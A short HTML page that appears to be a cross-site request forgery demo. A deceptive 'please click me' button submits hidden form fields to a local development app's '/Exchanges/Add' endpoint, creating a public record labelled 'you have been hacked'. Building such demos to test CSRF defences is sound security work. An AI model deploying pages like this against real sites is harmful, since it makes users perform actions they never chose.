<h1>Good looking page</h1>

<form action="https://exchangethings.local:5000/Exchanges/Add" method="post">
    <input type="hidden" name="Name" value="malicious name" />
    <input type="hidden" name="Description" value="you have been hacked" />
    <input type="hidden" name="IsVisible" value="true" />
    <input type="hidden" name="IsPublic" value="true" />

    <input type="submit" value="please click me" />
</form>